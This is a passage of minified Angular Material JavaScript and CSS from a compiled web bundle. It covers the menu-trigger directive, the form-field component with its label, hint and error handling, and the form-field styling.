.mat-mdc-menu-panel"),backdropClass:e.backdropClass||"cdk-overlay-transparent-backdrop",panelClass:e.overlayPanelClass,scrollStrategy:this._scrollStrategy(),direction:this._dir})}_subscribeToPositions(e,i){e.setPositionClasses&&i.positionChanges.subscribe(n=>{const r="start"===n.connectionPair.overlayX?"after":"before",c="top"===n.connectionPair.overlayY?"below":"above";this._ngZone?this._ngZone.run(()=>e.setPositionClasses(r,c)):e.setPositionClasses(r,c)})}_setPosition(e,i){let[n,r]="before"===e.xPosition?["end","start"]:["start","end"],[c,d]="above"===e.yPosition?["bottom","top"]:["top","bottom"],[T,k]=[c,d],[q,Y]=[n,r],te=0;if(this.triggersSubmenu()){if(Y=n="before"===e.xPosition?"start":"end",r=q="end"===n?"start":"end",this._parentMaterialMenu){if(null==this._parentInnerPadding){const pe=this._parentMaterialMenu.items.first;this._parentInnerPadding=pe?pe._getHostElement().offsetTop:0}te="bottom"===c?this._parentInnerPadding:-this._parentInnerPadding}}else e.overlapTrigger||(T="top"===c?"bottom":"top",k="top"===d?"bottom":"top");i.withPositions([{originX:n,originY:T,overlayX:q,overlayY:c,offsetY:te},{originX:r,originY:T,overlayX:Y,overlayY:c,offsetY:te},{originX:n,originY:k,overlayX:q,overlayY:d,offsetY:-te},{originX:r,originY:k,overlayX:Y,overlayY:d,offsetY:-te}])}_menuClosingActions(){const e=this._overlayRef.backdropClick(),i=this._overlayRef.detachments();return ra(e,this._parentMaterialMenu?this._parentMaterialMenu.closed:Bi(),this._parentMaterialMenu?this._parentMaterialMenu._hovered().pipe(Dn(c=>c!==this._menuItemInstance),Dn(()=>this._menuOpen)):Bi(),i)}_handleMousedown(e){W3(e)||(this._openedBy=0===e.button?"mouse":void 0,this.triggersSubmenu()&&e.preventDefault())}_handleKeydown(e){const i=e.keyCode;(13===i||32===i)&&(this._openedBy="keyboard"),this.triggersSubmenu()&&(39===i&&"ltr"===this.dir||37===i&&"rtl"===this.dir)&&(this._openedBy="keyboard",this.openMenu())}_handleClick(e){this.triggersSubmenu()?(e.stopPropagation(),this.openMenu()):this.toggleMenu()}_handleHover(){!this.triggersSubmenu()||!this._parentMaterialMenu||(this._hoverSubscription=this._parentMaterialMenu._hovered().pipe(Dn(e=>e===this._menuItemInstance&&!e.disabled),Z3(0,dw)).subscribe(()=>{this._openedBy="mouse",this.menu instanceof rb&&this.menu._isAnimating?this.menu._animationDone.pipe(Cn(1),Z3(0,dw),ea(this._parentMaterialMenu._hovered())).subscribe(()=>this.openMenu()):this.openMenu()}))}_getPortal(e){return(!this._portal||this._portal.templateRef!==e.templateRef)&&(this._portal=new Mm(e.templateRef,this._viewContainerRef)),this._portal}}return t.\u0275fac=function(e){return new(e||t)(Ee(As),Ee(mi),Ee(fo),Ee(n8),Ee(a8,8),Ee(qo,10),Ee(Cr,8),Ee(js),Ee(qi))},t.\u0275dir=Ot({type:t,hostVars:3,hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})("mousedown",function(r){return i._handleMousedown(r)})("keydown",function(r){return i._handleKeydown(r)}),2&e&&Rt("aria-haspopup",i.menu?"menu":null)("aria-expanded",i.menuOpen||null)("aria-controls",i.menuOpen?i.menu.panelId:null)},inputs:{_deprecatedMatMenuTriggerFor:["mat-menu-trigger-for","_deprecatedMatMenuTriggerFor"],menu:["matMenuTriggerFor","menu"],menuData:["matMenuTriggerData","menuData"],restoreFocus:["matMenuTriggerRestoreFocus","restoreFocus"]},outputs:{menuOpened:"menuOpened",onMenuOpen:"onMenuOpen",menuClosed:"menuClosed",onMenuClose:"onMenuClose"}}),t})(),po=(()=>{class t extends rge{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","mat-menu-trigger-for",""],["","matMenuTriggerFor",""]],hostAttrs:[1,"mat-menu-trigger"],exportAs:["matMenuTrigger"],features:[ci]}),t})(),o8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[oge],imports:[rn,la,Od,bu,uu,la]}),t})();const sge=["connectionContainer"],cge=["inputContainer"],lge=["label"];function dge(t,a){1&t&&(bt(0),m(1,"div",14),it(2,"div",15)(3,"div",16)(4,"div",17),u(),m(5,"div",18),it(6,"div",15)(7,"div",16)(8,"div",17),u(),Mt())}function mge(t,a){if(1&t){const e=Ye();m(0,"div",19),he("cdkObserveContent",function(){return be(e),Me(B().updateOutlineGap())}),va(1,1),u()}2&t&&V("cdkObserveContentDisabled","outline"!=B().appearance)}function uge(t,a){if(1&t&&(bt(0),va(1,2),m(2,"span"),s(3),u(),Mt()),2&t){const e=B(2);C(3),ke(e._control.placeholder)}}function hge(t,a){1&t&&va(0,3,["*ngSwitchCase","true"])}function fge(t,a){1&t&&(m(0,"span",23),s(1," *"),u())}function pge(t,a){if(1&t){const e=Ye();m(0,"label",20,21),he("cdkObserveContent",function(){return be(e),Me(B().updateOutlineGap())}),ne(2,uge,4,1,"ng-container",12),ne(3,hge,1,0,"ng-content",12),ne(4,fge,2,0,"span",22),u()}if(2&t){const e=B();Ct("mat-empty",e._control.empty&&!e._shouldAlwaysFloat())("mat-form-field-empty",e._control.empty&&!e._shouldAlwaysFloat())("mat-accent","accent"==e.color)("mat-warn","warn"==e.color),V("cdkObserveContentDisabled","outline"!=e.appearance)("id",e._labelId)("ngSwitch",e._hasLabel()),Rt("for",e._control.id)("aria-owns",e._control.id),C(2),V("ngSwitchCase",!1),C(1),V("ngSwitchCase",!0),C(1),V("ngIf",!e.hideRequiredMarker&&e._control.required&&!e._control.disabled)}}function _ge(t,a){1&t&&(m(0,"div",24),va(1,4),u())}function gge(t,a){if(1&t&&(m(0,"div",25),it(1,"span",26),u()),2&t){const e=B();C(1),Ct("mat-accent","accent"==e.color)("mat-warn","warn"==e.color)}}function Cge(t,a){1&t&&(m(0,"div"),va(1,5),u()),2&t&&V("@transitionMessages",B()._subscriptAnimationState)}function yge(t,a){if(1&t&&(m(0,"div",30),s(1),u()),2&t){const e=B(2);V("id",e._hintLabelId),C(1),ke(e.hintLabel)}}function bge(t,a){if(1&t&&(m(0,"div",27),ne(1,yge,2,2,"div",28),va(2,6),it(3,"div",29),va(4,7),u()),2&t){const e=B();V("@transitionMessages",e._subscriptAnimationState),C(1),V("ngIf",e.hintLabel)}}const Mge=["*",[["","matPrefix",""]],[["mat-placeholder"]],[["mat-label"]],[["","matSuffix",""]],[["mat-error"]],[["mat-hint",3,"align","end"]],[["mat-hint","align","end"]]],vge=["*","[matPrefix]","mat-placeholder","mat-label","[matSuffix]","mat-error","mat-hint:not([align='end'])","mat-hint[align='end']"];let Age=0;const cF=new ni("MatError");let Tge=(()=>{class t{constructor(e,i){this.id="mat-error-"+Age++,e||i.nativeElement.setAttribute("aria-live","polite")}}return t.\u0275fac=function(e){return new(e||t)(Vr("aria-live"),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["mat-error"]],hostAttrs:["aria-atomic","true",1,"mat-error"],hostVars:1,hostBindings:function(e,i){2&e&&Rt("id",i.id)},inputs:{id:"id"},features:[ki([{provide:cF,useExisting:t}])]}),t})();const Ege={transitionMessages:nr("transitionMessages",[sn("enter",zi({opacity:1,transform:"translateY(0%)"})),gn("void => enter",[zi({opacity:0,transform:"translateY(-5px)"}),En("300ms cubic-bezier(0.55, 0, 0.55, 0.2)")])])};let sb=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t}),t})(),Dge=0;const lF=new ni("MatHint");let fp=(()=>{class t{constructor(){this.align="start",this.id="mat-hint-"+Dge++}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-hint"]],hostAttrs:[1,"mat-hint"],hostVars:4,hostBindings:function(e,i){2&e&&(Rt("id",i.id)("align",null),Ct("mat-form-field-hint-end","end"===i.align))},inputs:{align:"align",id:"id"},features:[ki([{provide:lF,useExisting:t}])]}),t})(),un=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-label"]]}),t})(),xge=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-placeholder"]]}),t})();const dF=new ni("MatPrefix");let mF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","matPrefix",""]],features:[ki([{provide:dF,useExisting:t}])]}),t})();const uF=new ni("MatSuffix");let jr=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","matSuffix",""]],features:[ki([{provide:uF,useExisting:t}])]}),t})(),hF=0;const Ige=Pd(class{constructor(t){this._elementRef=t}},"primary"),Rge=new ni("MAT_FORM_FIELD_DEFAULT_OPTIONS"),cb=new ni("MatFormField");let nn=(()=>{class t extends Ige{constructor(e,i,n,r,c,d,T){super(e),this._changeDetectorRef=i,this._dir=n,this._defaults=r,this._platform=c,this._ngZone=d,this._outlineGapCalculationNeededImmediately=!1,this._outlineGapCalculationNeededOnStable=!1,this._destroyed=new J,this._hideRequiredMarker=!1,this._showAlwaysAnimate=!1,this._subscriptAnimationState="",this._hintLabel="",this._hintLabelId="mat-hint-"+hF++,this._labelId="mat-form-field-label-"+hF++,this.floatLabel=this._getDefaultFloatLabelState(),this._animationsEnabled="NoopAnimations"!==T,this.appearance=(null==r?void 0:r.appearance)||"legacy",r&&(this._hideRequiredMarker=Boolean(r.hideRequiredMarker),r.color&&(this.color=this.defaultColor=r.color))}get appearance(){return this._appearance}set appearance(e){var i;const n=this._appearance;this._appearance=e||(null===(i=this._defaults)||void 0===i?void 0:i.appearance)||"legacy","outline"===this._appearance&&n!==e&&(this._outlineGapCalculationNeededOnStable=!0)}get hideRequiredMarker(){return this._hideRequiredMarker}set hideRequiredMarker(e){this._hideRequiredMarker=wi(e)}_shouldAlwaysFloat(){return"always"===this.floatLabel&&!this._showAlwaysAnimate}_canLabelFloat(){return"never"!==this.floatLabel}get hintLabel(){return this._hintLabel}set hintLabel(e){this._hintLabel=e,this._processHints()}get floatLabel(){return"legacy"!==this.appearance&&"never"===this._floatLabel?"auto":this._floatLabel}set floatLabel(e){e!==this._floatLabel&&(this._floatLabel=e||this._getDefaultFloatLabelState(),this._changeDetectorRef.markForCheck())}get _control(){return this._explicitFormFieldControl||this._controlNonStatic||this._controlStatic}set _control(e){this._explicitFormFieldControl=e}getLabelId(){return this._hasFloatingLabel()?this._labelId:null}getConnectedOverlayOrigin(){return this._connectionContainerRef||this._elementRef}ngAfterContentInit(){this._validateControlChild();const e=this._control;e.controlType&&this._elementRef.nativeElement.classList.add(`mat-form-field-type-${e.controlType}`),e.stateChanges.pipe(Ro(null)).subscribe(()=>{this._validatePlaceholders(),this._syncDescribedByIds(),this._changeDetectorRef.markForCheck()}),e.ngControl&&e.ngControl.valueChanges&&e.ngControl.valueChanges.pipe(ea(this._destroyed)).subscribe(()=>this._changeDetectorRef.markForCheck()),this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.pipe(ea(this._destroyed)).subscribe(()=>{this._outlineGapCalculationNeededOnStable&&this.updateOutlineGap()})}),ra(this._prefixChildren.changes,this._suffixChildren.changes).subscribe(()=>{this._outlineGapCalculationNeededOnStable=!0,this._changeDetectorRef.markForCheck()}),this._hintChildren.changes.pipe(Ro(null)).subscribe(()=>{this._processHints(),this._changeDetectorRef.markForCheck()}),this._errorChildren.changes.pipe(Ro(null)).subscribe(()=>{this._syncDescribedByIds(),this._changeDetectorRef.markForCheck()}),this._dir&&this._dir.change.pipe(ea(this._destroyed)).subscribe(()=>{"function"==typeof requestAnimationFrame?this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>this.updateOutlineGap())}):this.updateOutlineGap()})}ngAfterContentChecked(){this._validateControlChild(),this._outlineGapCalculationNeededImmediately&&this.updateOutlineGap()}ngAfterViewInit(){this._subscriptAnimationState="enter",this._changeDetectorRef.detectChanges()}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_shouldForward(e){const i=this._control?this._control.ngControl:null;return i&&i[e]}_hasPlaceholder(){return!!(this._control&&this._control.placeholder||this._placeholderChild)}_hasLabel(){return!(!this._labelChildNonStatic&&!this._labelChildStatic)}_shouldLabelFloat(){return this._canLabelFloat()&&(this._control&&this._control.shouldLabelFloat||this._shouldAlwaysFloat())}_hideControlPlaceholder(){return"legacy"===this.appearance&&!this._hasLabel()||this._hasLabel()&&!this._shouldLabelFloat()}_hasFloatingLabel(){return this._hasLabel()||"legacy"===this.appearance&&this._hasPlaceholder()}_getDisplayedMessages(){return this._errorChildren&&this._errorChildren.length>0&&this._control.errorState?"error":"hint"}_animateAndLockLabel(){this._hasFloatingLabel()&&this._canLabelFloat()&&(this._animationsEnabled&&this._label&&(this._showAlwaysAnimate=!0,Tc(this._label.nativeElement,"transitionend").pipe(Cn(1)).subscribe(()=>{this._showAlwaysAnimate=!1})),this.floatLabel="always",this._changeDetectorRef.markForCheck())}_validatePlaceholders(){}_processHints(){this._validateHints(),this._syncDescribedByIds()}_validateHints(){}_getDefaultFloatLabelState(){return this._defaults&&this._defaults.floatLabel||"auto"}_syncDescribedByIds(){if(this._control){let e=[];if(this._control.userAriaDescribedBy&&"string"==typeof this._control.userAriaDescribedBy&&e.push(...this._control.userAriaDescribedBy.split(" ")),"hint"===this._getDisplayedMessages()){const i=this._hintChildren?this._hintChildren.find(r=>"start"===r.align):null,n=this._hintChildren?this._hintChildren.find(r=>"end"===r.align):null;i?e.push(i.id):this._hintLabel&&e.push(this._hintLabelId),n&&e.push(n.id)}else this._errorChildren&&e.push(...this._errorChildren.map(i=>i.id));this._control.setDescribedByIds(e)}}_validateControlChild(){}updateOutlineGap(){const e=this._label?this._label.nativeElement:null,i=this._connectionContainerRef.nativeElement,n=".mat-form-field-outline-start",r=".mat-form-field-outline-gap";if("outline"!==this.appearance||!this._platform.isBrowser)return;if(!e||!e.children.length||!e.textContent.trim()){const q=i.querySelectorAll(`${n}, ${r}`);for(let Y=0;Y<q.length;Y++)q[Y].style.width="0";return}if(!this._isAttachedToDOM())return void(this._outlineGapCalculationNeededImmediately=!0);let c=0,d=0;const T=i.querySelectorAll(n),k=i.querySelectorAll(r);if(this._label&&this._label.nativeElement.children.length){const q=i.getBoundingClientRect();if(0===q.width&&0===q.height)return this._outlineGapCalculationNeededOnStable=!0,void(this._outlineGapCalculationNeededImmediately=!1);const Y=this._getStartEnd(q),te=e.children,pe=this._getStartEnd(te[0].getBoundingClientRect());let Re=0;for(let Fe=0;Fe<te.length;Fe++)Re+=te[Fe].offsetWidth;c=Math.abs(pe-Y)-5,d=Re>0?.75*Re+10:0}for(let q=0;q<T.length;q++)T[q].style.width=`${c}px`;for(let q=0;q<k.length;q++)k[q].style.width=`${d}px`;this._outlineGapCalculationNeededOnStable=this._outlineGapCalculationNeededImmediately=!1}_getStartEnd(e){return this._dir&&"rtl"===this._dir.value?e.right:e.left}_isAttachedToDOM(){const e=this._elementRef.nativeElement;if(e.getRootNode){const i=e.getRootNode();return i&&i!==e}return document.documentElement.contains(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(Cr,8),Ee(Rge,8),Ee(cr),Ee(qi),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-form-field"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,sb,5),fa(n,sb,7),fa(n,un,5),fa(n,un,7),fa(n,xge,5),fa(n,cF,5),fa(n,lF,5),fa(n,dF,5),fa(n,uF,5)),2&e){let r;Vt(r=Bt())&&(i._controlNonStatic=r.first),Vt(r=Bt())&&(i._controlStatic=r.first),Vt(r=Bt())&&(i._labelChildNonStatic=r.first),Vt(r=Bt())&&(i._labelChildStatic=r.first),Vt(r=Bt())&&(i._placeholderChild=r.first),Vt(r=Bt())&&(i._errorChildren=r),Vt(r=Bt())&&(i._hintChildren=r),Vt(r=Bt())&&(i._prefixChildren=r),Vt(r=Bt())&&(i._suffixChildren=r)}},viewQuery:function(e,i){if(1&e&&(Mi(sge,7),Mi(cge,5),Mi(lge,5)),2&e){let n;Vt(n=Bt())&&(i._connectionContainerRef=n.first),Vt(n=Bt())&&(i._inputContainerRef=n.first),Vt(n=Bt())&&(i._label=n.first)}},hostAttrs:[1,"mat-form-field"],hostVars:40,hostBindings:function(e,i){2&e&&Ct("mat-form-field-appearance-standard","standard"==i.appearance)("mat-form-field-appearance-fill","fill"==i.appearance)("mat-form-field-appearance-outline","outline"==i.appearance)("mat-form-field-appearance-legacy","legacy"==i.appearance)("mat-form-field-invalid",i._control.errorState)("mat-form-field-can-float",i._canLabelFloat())("mat-form-field-should-float",i._shouldLabelFloat())("mat-form-field-has-label",i._hasFloatingLabel())("mat-form-field-hide-placeholder",i._hideControlPlaceholder())("mat-form-field-disabled",i._control.disabled)("mat-form-field-autofilled",i._control.autofilled)("mat-focused",i._control.focused)("ng-untouched",i._shouldForward("untouched"))("ng-touched",i._shouldForward("touched"))("ng-pristine",i._shouldForward("pristine"))("ng-dirty",i._shouldForward("dirty"))("ng-valid",i._shouldForward("valid"))("ng-invalid",i._shouldForward("invalid"))("ng-pending",i._shouldForward("pending"))("_mat-animation-noopable",!i._animationsEnabled)},inputs:{color:"color",appearance:"appearance",hideRequiredMarker:"hideRequiredMarker",hintLabel:"hintLabel",floatLabel:"floatLabel"},exportAs:["matFormField"],features:[ki([{provide:cb,useExisting:t}]),ci],ngContentSelectors:vge,decls:15,vars:8,consts:[[1,"mat-form-field-wrapper"],[1,"mat-form-field-flex",3,"click"],["connectionContainer",""],[4,"ngIf"],["class","mat-form-field-prefix",3,"cdkObserveContentDisabled","cdkObserveContent",4,"ngIf"],[1,"mat-form-field-infix"],["inputContainer",""],[1,"mat-form-field-label-wrapper"],["class","mat-form-field-label",3,"cdkObserveContentDisabled","id","mat-empty","mat-form-field-empty","mat-accent","mat-warn","ngSwitch","cdkObserveContent",4,"ngIf"],["class","mat-form-field-suffix",4,"ngIf"],["class","mat-form-field-underline",4,"ngIf"],[1,"mat-form-field-subscript-wrapper",3,"ngSwitch"],[4,"ngSwitchCase"],["class","mat-form-field-hint-wrapper",4,"ngSwitchCase"],[1,"mat-form-field-outline"],[1,"mat-form-field-outline-start"],[1,"mat-form-field-outline-gap"],[1,"mat-form-field-outline-end"],[1,"mat-form-field-outline","mat-form-field-outline-thick"],[1,"mat-form-field-prefix",3,"cdkObserveContentDisabled","cdkObserveContent"],[1,"mat-form-field-label",3,"cdkObserveContentDisabled","id","ngSwitch","cdkObserveContent"],["label",""],["class","mat-placeholder-required mat-form-field-required-marker","aria-hidden","true",4,"ngIf"],["aria-hidden","true",1,"mat-placeholder-required","mat-form-field-required-marker"],[1,"mat-form-field-suffix"],[1,"mat-form-field-underline"],[1,"mat-form-field-ripple"],[1,"mat-form-field-hint-wrapper"],["class","mat-hint",3,"id",4,"ngIf"],[1,"mat-form-field-hint-spacer"],[1,"mat-hint",3,"id"]],template:function(e,i){1&e&&(Jn(Mge),m(0,"div",0)(1,"div",1,2),he("click",function(r){return i._control.onContainerClick&&i._control.onContainerClick(r)}),ne(3,dge,9,0,"ng-container",3),ne(4,mge,2,1,"div",4),m(5,"div",5,6),va(7),m(8,"span",7),ne(9,pge,5,16,"label",8),u()(),ne(10,_ge,2,0,"div",9),u(),ne(11,gge,2,4,"div",10),m(12,"div",11),ne(13,Cge,2,1,"div",12),ne(14,bge,5,2,"div",13),u()()),2&e&&(C(3),V("ngIf","outline"==i.appearance),C(1),V("ngIf",i._prefixChildren.length),C(5),V("ngIf",i._hasFloatingLabel()),C(1),V("ngIf",i._suffixChildren.length),C(1),V("ngIf","outline"!=i.appearance),C(1),V("ngSwitch",i._getDisplayedMessages()),C(1),V("ngSwitchCase","error"),C(1),V("ngSwitchCase","hint"))},dependencies:[Ri,Jf,p1,P3],styles:[".mat-form-field{display:inline-block;position:relative;text-align:left}[dir=rtl] .mat-form-field{text-align:right}.mat-form-field-wrapper{position:relative}.mat-form-field-flex{display:inline-flex;align-items:baseline;box-sizing:border-box;width:100%}.mat-form-field-prefix,.mat-form-field-suffix{white-space:nowrap;flex:none;position:relative}.mat-form-field-infix{display:block;position:relative;flex:auto;min-width:0;width:180px}.cdk-high-contrast-active .mat-form-field-infix{border-image:linear-gradient(transparent, transparent)}.mat-form-field-label-wrapper{position:absolute;left:0;box-sizing:content-box;width:100%;height:100%;overflow:hidden;pointer-events:none}[dir=rtl] .mat-form-field-label-wrapper{left:auto;right:0}.mat-form-field-label{position:absolute;left:0;font:inherit;pointer-events:none;width:100%;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;transform-origin:0 0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),width 400ms cubic-bezier(0.25, 0.8, 0.25, 1);display:none}[dir=rtl] .mat-form-field-label{transform-origin:100% 0;left:auto;right:0}.cdk-high-contrast-active .mat-form-field-disabled .mat-form-field-label{color:GrayText}.mat-form-field-empty.mat-form-field-label,.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-label{display:block}.mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:block;transition:none}.mat-input-server:focus+.mat-form-field-label-wrapper .mat-form-field-label,.mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-input-server:focus+.mat-form-field-label-wrapper .mat-form-field-label,.mat-form-field-can-float .mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-label-wrapper .mat-form-field-label{display:block}.mat-form-field-label:not(.mat-form-field-empty){transition:none}.mat-form-field-underline{position:absolute;width:100%;pointer-events:none;transform:scale3d(1, 1.0001, 1)}.mat-form-field-ripple{position:absolute;left:0;width:100%;transform-origin:50%;transform:scaleX(0.5);opacity:0;transition:background-color 300ms cubic-bezier(0.55, 0, 0.55, 0.2)}.mat-form-field.mat-focused .mat-form-field-ripple,.mat-form-field.mat-form-field-invalid .mat-form-field-ripple{opacity:1;transform:none;transition:transform 300ms cubic-bezier(0.25, 0.8, 0.25, 1),opacity 100ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 300ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-subscript-wrapper{position:absolute;box-sizing:border-box;width:100%;overflow:hidden}.mat-form-field-subscript-wrapper .mat-icon,.mat-form-field-label-wrapper .mat-icon{width:1em;height:1em;font-size:inherit;vertical-align:baseline}.mat-form-field-hint-wrapper{display:flex}.mat-form-field-hint-spacer{flex:1 0 1em}.mat-error{display:block}.mat-form-field-control-wrapper{position:relative}.mat-form-field-hint-end{order:1}.mat-form-field._mat-animation-noopable .mat-form-field-label,.mat-form-field._mat-animation-noopable .mat-form-field-ripple{transition:none}",'.mat-form-field-appearance-fill .mat-form-field-flex{border-radius:4px 4px 0 0;padding:.75em .75em 0 .75em}.cdk-high-contrast-active .mat-form-field-appearance-fill .mat-form-field-flex{outline:solid 1px}.cdk-high-contrast-active .mat-form-field-appearance-fill.mat-form-field-disabled .mat-form-field-flex{outline-color:GrayText}.cdk-high-contrast-active .mat-form-field-appearance-fill.mat-focused .mat-form-field-flex{outline:dashed 3px}.mat-form-field-appearance-fill .mat-form-field-underline::before{content:"";display:block;position:absolute;bottom:0;height:1px;width:100%}.mat-form-field-appearance-fill .mat-form-field-ripple{bottom:0;height:2px}.cdk-high-contrast-active .mat-form-field-appearance-fill .mat-form-field-ripple{height:0}.mat-form-field-appearance-fill:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{opacity:1;transform:none;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-fill._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{transition:none}.mat-form-field-appearance-fill .mat-form-field-subscript-wrapper{padding:0 1em}','.mat-input-element{font:inherit;background:rgba(0,0,0,0);color:currentColor;border:none;outline:none;padding:0;margin:0;width:100%;max-width:100%;vertical-align:bottom;text-align:inherit;box-sizing:content-box}.mat-input-element:-moz-ui-invalid{box-shadow:none}.mat-input-element,.mat-input-element::-webkit-search-cancel-button,.mat-input-element::-webkit-search-decoration,.mat-input-element::-webkit-search-results-button,.mat-input-element::-webkit-search-results-decoration{-webkit-appearance:none}.mat-input-element::-webkit-contacts-auto-fill-button,.mat-input-element::-webkit-caps-lock-indicator,.mat-input-element:not([type=password])::-webkit-credentials-auto-fill-button{visibility:hidden}.mat-input-element[type=date],.mat-input-element[type=datetime],.mat-input-element[type=datetime-local],.mat-input-element[type=month],.mat-input-element[type=week],.mat-input-element[type=time]{line-height:1}.mat-input-element[type=date]::after,.mat-input-element[type=datetime]::after,.mat-input-element[type=datetime-local]::after,.mat-input-element[type=month]::after,.mat-input-element[type=week]::after,.mat-input-element[type=time]::after{content:" ";white-space:pre;width:1px}.mat-input-element::-webkit-inner-spin-button,.mat-input-element::-webkit-calendar-picker-indicator,.mat-input-element::-webkit-clear-button{font-size:.75em}.mat-input-element::placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::-moz-placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::-webkit-input-placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element:-ms-input-placeholder{-webkit-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-hide-placeholder .mat-input-element::placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element::placeholder{opacity:0}.mat-form-field-hide-placeholder .mat-input-element::-moz-placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element::-moz-placeholder{opacity:0}.mat-form-field-hide-placeholder .mat-input-element::-webkit-input-placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element::-webkit-input-placeholder{opacity:0}.mat-form-field-hide-placeholder .mat-input-element:-ms-input-placeholder{color:rgba(0,0,0,0) !important;-webkit-text-fill-color:rgba(0,0,0,0);transition:none}.cdk-high-contrast-active .mat-form-field-hide-placeholder .mat-input-element:-ms-input-placeholder{opacity:0}._mat-animation-noopable .mat-input-element::placeholder{transition:none}._mat-animation-noopable .mat-input-element::-moz-placeholder{transition:none}._mat-animation-noopable .mat-input-element::-webkit-input-placeholder{transition:none}._mat-animation-noopable .mat-input-element:-ms-input-placeholder{transition:none}textarea.mat-input-element{resize:vertical;overflow:auto}textarea.mat-input-element.cdk-textarea-autosize{resize:none}textarea.mat-input-element{padding:2px 0;margin:-2px 0}select.mat-input-element{-moz-appearance:none;-webkit-appearance:none;position:relative;background-color:rgba(0,0,0,0);display:inline-flex;box-sizing:border-box;padding-top:1em;top:-1em;margin-bottom:-1em}select.mat-input-element::-moz-focus-inner{border:0}select.mat-input-element:not(:disabled){cursor:pointer}.mat-form-field-type-mat-native-select .mat-form-field-infix::after{content:"";width:0;height:0;border-left:5px solid rgba(0,0,0,0);border-right:5px solid rgba(0,0,0,0);border-top:5px solid;position:absolute;top:50%;right:0;margin-top:-2.5px;pointer-events:none}[dir=rtl] .mat-form-field-type-mat-native-select .mat-form-field-infix::after{right:auto;left:0}.mat-form-field-type-mat-native-select .mat-input-element{padding-right:15px}[dir=rtl] .mat-form-field-type-mat-native-select .mat-input-element{padding-right:0;padding-left:15px}.mat-form-field-type-mat-native-select .mat-form-field-label-wrapper{max-width:calc(100% - 10px)}.mat-form-field-type-mat-native-select.mat-form-field-appearance-outline .mat-form-field-infix::after{margin-top:-5px}.mat-form-field-type-mat-native-select.mat-form-field-appearance-fill .mat-form-field-infix::after{margin-top:-10px}',".mat-form-field-appearance-legacy .mat-form-field-label{transform:perspective(100px)}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon{width:1em}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon-button,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon-button{font:inherit;vertical-align:baseline}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon-button .mat-icon{font-size:inherit}.mat-form-field-appearance-legacy .mat-form-field-underline{height:1px}.cdk-high-contrast-active .mat-form-field-appearance-legacy .mat-form-field-underline{height:0;border-top:solid 1px}.mat-form-field-appearance-legacy .mat-form-field-ripple{top:0;height:2px;overflow:hidden}.cdk-high-contrast-active .mat-form-field-appearance-legacy .mat-form-field-ripple{height:0;border-top:solid 2px}.mat-form-field-appearance-legacy.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:rgba(0,0,0,0)}.cdk-high-contrast-active .mat-form-field-appearance-legacy.mat-form-field-disabled .mat-form-field-underline{border-top-style:dotted;border-top-width:2px;border-top-color:GrayText}.mat-form-field-appearance-legacy.mat-form-field-invalid:not(.mat-focused) 